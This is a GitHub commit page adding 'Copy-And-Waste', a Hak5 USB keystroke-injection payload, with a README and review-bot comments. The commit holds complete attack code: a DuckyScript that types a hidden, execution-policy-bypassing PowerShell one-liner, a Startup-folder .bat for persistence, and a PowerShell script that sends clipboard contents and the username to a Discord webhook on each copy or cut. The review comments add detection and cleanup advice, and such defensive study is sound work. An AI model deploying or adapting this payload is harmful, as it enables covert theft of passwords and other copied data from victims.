Merge pull request #546 from atomiczsec/master

New Payload - Copy-And-Waste
pull/554/head
hak5glytch 2022-10-09 11:57:16 -06:00 committed by GitHub
commit 8f19915a5f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 175 additions and 0 deletions


@ -0,0 +1,3 @@
@echo off
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause
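Review bot: Nothing in this launcher says what it is or what it starts, so someone who finds it during triage has to trace `c.ps1` by hand; a header such as `REM Copy-And-Waste launcher: runs AppData\Roaming\c.ps1 (clipboard exfiltration payload)` would identify it. The file's path is not shown on this page, but the README in this commit says the .bat is placed in the Startup folder, so this command would run at every logon. For detection, the pattern to key on is a Startup-folder script spawning `powershell` with `-w h -NoP -NonI -Ep Bypass -File` against a script under `AppData\Roaming`.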


@ -0,0 +1,119 @@
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Copy+And+Waste!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Copy-And-Waste
A payload to exfiltrate clipboard contents
## Description
This payload uses iwr to download 2 files
* I.bat
* c.ps1
**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup
**c.ps1** will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click
Then the contents will then be sent to the discord webhook for viewing pleasure
For killing the script press both Ctrl buttons at the same time [It will resume at reboot]
## Getting Started
### Dependencies
* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec) &
[I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>


@ -0,0 +1,36 @@
Add-Type -AssemblyName WindowsBase
Add-Type -AssemblyName PresentationCore
function dischat {
[CmdletBinding()]
param (
[Parameter (Position=0,Mandatory = $True)]
[string]$con
)
$hookUrl = 'YOUR DISCORD WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $con
}
Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body
}
dischat (get-clipboard)
while (1){
$Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
$Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)
$cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)
$xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)
if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}
elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit}
else {continue}
}
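Review bot: The script has no header comment stating what leaves the host: `dischat` posts the clipboard text together with `$env:username` to `$hookUrl`, once at start and again whenever a Ctrl key is down with C or X, which will include anything copied from a password manager. A comment block at the top should state the data sent, the destination, and the stop condition (both Ctrl keys, after which the `connection lost` message is posted and the script exits). The `while (1)` loop polls key state with no wait, so the likely observable footprint is a long-running hidden `powershell.exe` with sustained CPU use and repeated POSTs to a webhook URL. PowerShell script-block logging and egress filtering for webhook endpoints are the relevant controls.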


@ -0,0 +1,17 @@
REM Title: Copy-And-Waste
REM Author: atomiczsec & I am Jakoby
REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
REM Target: Windows 10, 11
DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
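Review bot: The payload documents setup but not removal: the `STRING` line writes `l.bat` into the user's Startup folder and `c.ps1` into `%APPDATA%`, and neither the REM lines nor the README say that both must be deleted to undo it. Add a line such as `REM Cleanup: delete "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\l.bat" and "%APPDATA%\c.ps1", then end the hidden powershell process`. The README in this commit names the startup file `I.bat` while this line writes `l.bat`; the two should agree so that cleanup and detection look for the right file name.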